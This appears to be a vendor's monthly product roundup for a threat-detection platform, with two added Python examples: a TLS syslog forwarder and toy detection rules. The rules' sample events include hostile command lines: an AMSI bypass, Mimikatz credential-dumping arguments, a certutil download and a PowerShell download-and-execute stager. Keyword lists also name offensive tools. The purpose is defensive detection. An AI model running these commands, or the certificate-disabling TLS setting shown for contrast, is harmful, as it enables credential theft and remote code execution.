AlienVault Monthly Product Roundup April 2018

We are continuously making improvements and rolling out new features to USM Anywhere to help your team be more effective at detecting and responding to threats. You can keep up with USM Anywhere releases by reading the release notes in the AlienVault Product Forum. Here is a roundup of the highlights from our April 2018 releases:

Go Threat Hunting with OTX Endpoint Threat Hunter™:

Okay, so technically this one is not a USM Anywhere feature, but it is very cool (and free!) and worth a mention here. Earlier this month, we launched OTX Endpoint Threat Hunter™, a new free service in Open Threat Exchange® (OTX™) that lets anyone scan their endpoints for malware and other threats using the indicators of compromise (IOCs) catalogued in OTX. It is powerful and easy to use, and it costs nothing.

Introducing our not-so-secret Agent, man:

OTX Endpoint Threat Hunter is powered by the AlienVault Agent—a lightweight and adaptable endpoint agent based on osquery. We plan to extend the use of the AlienVault Agent in USM Anywhere and have already begun to invite USM Anywhere users to request early access to the AlienVault Agent through the product, under the new Agents page. Participation in early access is limited.

The AlienVault Agent provides deep visibility into your environment with File Integrity Monitoring and event forwarding on Windows and Linux endpoints. It is simple and fast to install and has a small footprint. With the AlienVault Agent, you can get to endpoint security insights quickly, without the cost and complexity of a standalone endpoint security solution. We’ll announce general availability later this year, so stay tuned!

Leveling up our sensor security:

In an effort to constantly improve our security hygiene (we already floss daily), this month we added secure transport options to USM Anywhere sensors. Sensors now accept syslog over TCP (port 601) as well as syslog over TLS (port 6514). Keep the difference in mind when you configure forwarders: TCP gives you reliable delivery, but the log data still crosses the network in cleartext, and only the TLS listener on port 6514 encrypts it on its way to the sensor. Point devices and forwarders at 6514 wherever they support it, and make sure the forwarder actually verifies the sensor's certificate rather than accepting whatever certificate it is presented with; otherwise an on-path attacker can still read, drop, or forge the events you are relying on for detection.
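As an added example (not AlienVault or LevelBlue code), here is a minimal Python forwarder that shows what "secure transport" needs on the sending side: an RFC 5424 message, octet-counted framing for a stream transport, and a TLS client context that verifies the sensor's certificate. The sensor hostname, the CA file path and the sample event are assumptions made up for illustration; the unverified context is included only to show the weak setting beside the correct one.

```python
"""Forward a syslog event to a USM Anywhere sensor over TLS on port 6514.

Added example, not AlienVault/LevelBlue code. The sensor hostname, the CA
file path and the sample event are assumptions made up for illustration.
"""
import socket
import ssl
from datetime import datetime, timezone

SENSOR_HOST = "usm-sensor.example.internal"  # assumed sensor hostname; must match its certificate
TLS_PORT = 6514   # syslog over TLS (RFC 5425)
TCP_PORT = 601    # syslog over plain TCP: reliable delivery, but cleartext on the wire


def build_syslog_message(app, msg, facility=1, severity=6, host="webfront01", stamp=None):
    """Build an RFC 5424 message: <PRI>1 TIMESTAMP HOSTNAME APP-NAME - - - MSG."""
    pri = facility * 8 + severity
    if stamp is None:
        stamp = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    return f"<{pri}>1 {stamp} {host} {app} - - - {msg}".encode()


def frame_octet_counted(message):
    """Octet-counting framing used on TCP/TLS syslog: "<length> <message>".

    Unlike UDP, a stream has no datagram boundaries, so the receiver needs the
    length prefix to split consecutive events correctly.
    """
    return f"{len(message)} ".encode() + message


def make_verifying_context(cafile=None):
    """TLS client context that authenticates the sensor.

    With cafile=None the system trust store is used; pass the CA that signed
    the sensor certificate if it is private. check_hostname=True and
    verify_mode=CERT_REQUIRED are the defaults of create_default_context and
    are the whole point of using the TLS listener.
    """
    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=cafile)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def make_unverified_context():
    """The weak setting, shown only for contrast.

    Traffic is encrypted, but any on-path host presenting any certificate can
    terminate the connection, read the logs and forge events toward the sensor.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False      # must be cleared before verify_mode can be CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def send_over_tls(message, host=SENSOR_HOST, port=TLS_PORT, cafile=None, timeout=5.0):
    """Open a verified TLS session to the sensor and send one framed event."""
    ctx = make_verifying_context(cafile)
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            tls.sendall(frame_octet_counted(message))
            return tls.version()  # negotiated protocol, e.g. "TLSv1.3", for the caller to log


if __name__ == "__main__":
    event = build_syslog_message("sshd", "Accepted publickey for alice from 203.0.113.5 port 51514")
    print(frame_octet_counted(event).decode())
    # send_over_tls(event, cafile="/etc/ssl/usm-sensor-ca.pem")  # assumed CA path
```

If your forwarder is rsyslog or NXLog rather than custom code, the same three decisions apply: stream transport with octet-counted framing, TLS rather than plain TCP, and a peer-verification setting that checks the sensor's certificate against a CA you control instead of an "anonymous" or "no verify" mode.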

Show me the data sources:

When it comes to data collection for threat detection, the first and most important thing to know is whether your data sources are supported and how. To make it easier and faster to navigate data collection in USM Anywhere, we added a new Data Sources menu to the main navigation. This menu consolidates all the different ways USM Anywhere collects data from your environment: Sensors, Agents, and Integrations. The new Integrations page includes tabs for Plugins, Sensor Apps, and LevelBlueApps, which now includes the Forensics and Response App. In addition, we streamlined the existing Settings menu, again making USM Anywhere simple and fast to use.

New and improved data sources:

Speaking of data sources, we regularly add support for new data sources and improve our methods of collection, parsing, and normalization for existing data sources. You can always find our full list of data sources, including LevelBlueApps and plugins, here.

If you don’t see a data source here that you need, fear not: AlienVault will build support for most commercially available products at no additional charge.

This month, we added or updated the following data sources in USM Anywhere:

New Data Sources:

  • IBM QRadar Network Security
  • Infoblox
  • Fortinet FortiAnalyzer
  • HPE StoreOnce
  • Microsoft Exchange 2013
  • STEALTHbits Activity Monitor
  • Kerio
  • Silverpeak WAN Opti
  • AWS API Gateway

Improvements to Existing Data Sources:

  • AlienVault NIDS: added new highlight fields
  • Windows: added fields for port and application
  • Windows: added support for the new file hash fields
  • Microsoft: added support for collecting Microsoft SQL logs via NXLog
  • Office 365 Exchange: added fields for ClientIPAddress and ClientInfoString
  • Amazon: updated to correctly parse Amazon Linux logs
  • AWS CloudTrail: now captures access_key_id
  • FortiClient: fixed a log processing issue
  • Sysmon-NXLog: fixed source_process_id parsing
  • Duo: fixed incorrect destination designation
  • Netscaler: fixed missing event names
  • OpenVPN: fixed a name parsing issue
  • Cisco ASA: fixed missing access_control_outcome

Threat Intelligence delivered faster than your Amazon Prime order

Last, but never least, the LevelBlue Labs Security Research Team delivers threat intelligence updates to USM Anywhere every single day. This automated, actionable threat intelligence (no effort required on your part) keeps your USM Anywhere deployment current against emerging and evolving threats as they unfold in the wild.

In addition to all the data sources listed above, the LevelBlue Labs Security Research Team delivered the following threat intelligence to the USM Anywhere platform this month:

New Correlation Rules

  • New correlation rule to detect PowerLessShell
  • New correlation rule to detect common PowerShell attack frameworks
  • New correlation rule to detect a Java process spawning child processes
  • New correlation rule to detect known Mimikatz module names in process arguments
  • New correlation rule to detect certutil downloading files
  • New correlation rule to detect attackers/users disabling AMSI
  • New default Cisco Umbrella correlation rules
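To make the themes above concrete, here is an added example that is not AlienVault's correlation rules and not their implementation: simplified versions of five of them expressed as Python predicates and run over a handful of constructed Sysmon-style process-creation events. The field names, the matching patterns and the events themselves are assumptions for illustration.

```python
"""Toy re-creations of the detection themes listed above, run over a handful of
constructed Sysmon-style process-creation events.

Added example, not AlienVault's correlation rules: the field names, the
sample events and the matching patterns are illustrative assumptions.
"""
import re

# Constructed events in a Sysmon Event ID 1 shape (image, command line, parent image).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil -urlcache -split -f http://198.51.100.7/a.exe C:\Users\Public\a.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -nop -w hidden -c \"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                     ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\"",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Users\bob\Downloads\m.exe",
     "command_line": 'm.exe "privilege::debug" "sekurlsa::logonpasswords" exit',
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c whoami",
     "parent_image": r"C:\Program Files\Java\jre1.8.0_171\bin\java.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://203.0.113.9/launcher.ps1')\"",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    # Two benign events the rules must not fire on.
    {"image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil -verify server.cer",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -Command Get-Service",
     "parent_image": r"C:\Windows\explorer.exe"},
]

MIMIKATZ_MODULES = ("sekurlsa::", "lsadump::", "privilege::debug", "kerberos::", "crypto::")
FRAMEWORK_NAMES = ("invoke-mimikatz", "invoke-shellcode", "invoke-reflectivepeinjection",
                   "powersploit", "nishang")
POWERSHELL = ("powershell.exe", "pwsh.exe")


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_certutil_download(ev):
    """certutil fetching a remote URL: -urlcache/-verifyctl plus an http(s) URL."""
    cl = ev["command_line"].lower()
    return (basename(ev["image"]) == "certutil.exe"
            and ("urlcache" in cl or "verifyctl" in cl)
            and re.search(r"https?://", cl) is not None)


def rule_amsi_disabled(ev):
    """PowerShell touching the AMSI internals used by the common bypasses."""
    if basename(ev["image"]) not in POWERSHELL:
        return False
    return re.search(r"amsiinitfailed|amsiutils|amsiscanbuffer", ev["command_line"].lower()) is not None


def rule_mimikatz_args(ev):
    """Known Mimikatz module names anywhere in the arguments, whatever the binary is called."""
    cl = ev["command_line"].lower()
    return any(module in cl for module in MIMIKATZ_MODULES)


def rule_java_spawning_shell(ev):
    """A Java runtime spawning an interpreter: the usual shape of a web-app RCE."""
    return (basename(ev["parent_image"]) in ("java.exe", "javaw.exe", "java")
            and basename(ev["image"]) in ("cmd.exe", "powershell.exe", "wscript.exe",
                                          "cscript.exe", "sh", "bash"))


def rule_powershell_framework(ev):
    """Named offensive PowerShell modules, or the classic download-and-IEX stager."""
    if basename(ev["image"]) not in POWERSHELL:
        return False
    cl = ev["command_line"].lower()
    named = any(name in cl for name in FRAMEWORK_NAMES)
    staged = (re.search(r"\biex\b|invoke-expression", cl) is not None
              and re.search(r"downloadstring|downloadfile|frombase64string", cl) is not None)
    return named or staged


RULES = {
    "certutil downloading files": rule_certutil_download,
    "AMSI disabled from PowerShell": rule_amsi_disabled,
    "Mimikatz module in process argument": rule_mimikatz_args,
    "Java process spawning a shell": rule_java_spawning_shell,
    "PowerShell attack framework stager": rule_powershell_framework,
}


def evaluate(events):
    """Return (rule name, command line) for every rule that fires on every event."""
    hits = []
    for ev in events:
        for name, predicate in RULES.items():
            if predicate(ev):
                hits.append((name, ev["command_line"]))
    return hits


if __name__ == "__main__":
    for name, cmd in evaluate(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

Each predicate is deliberately narrow (certutil alone is not suspicious, certutil with -urlcache and a URL is), which is the trade-off a real correlation rule has to make: broad patterns catch renamed tools, narrow ones keep installers and admins from paging the on-call analyst.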

Updated Correlation Rules

  • Updated the 'Client Side Exploit – Known Vulnerability' correlation rule to detect Oracle WebLogic CVE-2018-2628
  • Updated the 'Malware Infection – Mobile Trojan' correlation rule to detect RedDrop activity
  • Updated the ‘Malware Infection – Remote Access Trojan’ correlation rule to detect Gh0st, njRAT, Remcos/Remvio, and Xtrat families
  • Added and updated 'Malware Infection – Trojan' correlation rules to detect malicious activity from the Adderall, MSIL, Win32, Hawkeye, RubberDucky, RadRAT, Marcher.w Banker, SLocker.PN, Panda Banker, and Triada.dm families

And, that’s the condensed version! For more info about our threat intelligence updates, including threat analysis, subscribe to the weekly threat intelligence newsletter from the LevelBlue Labs Security Research Team.
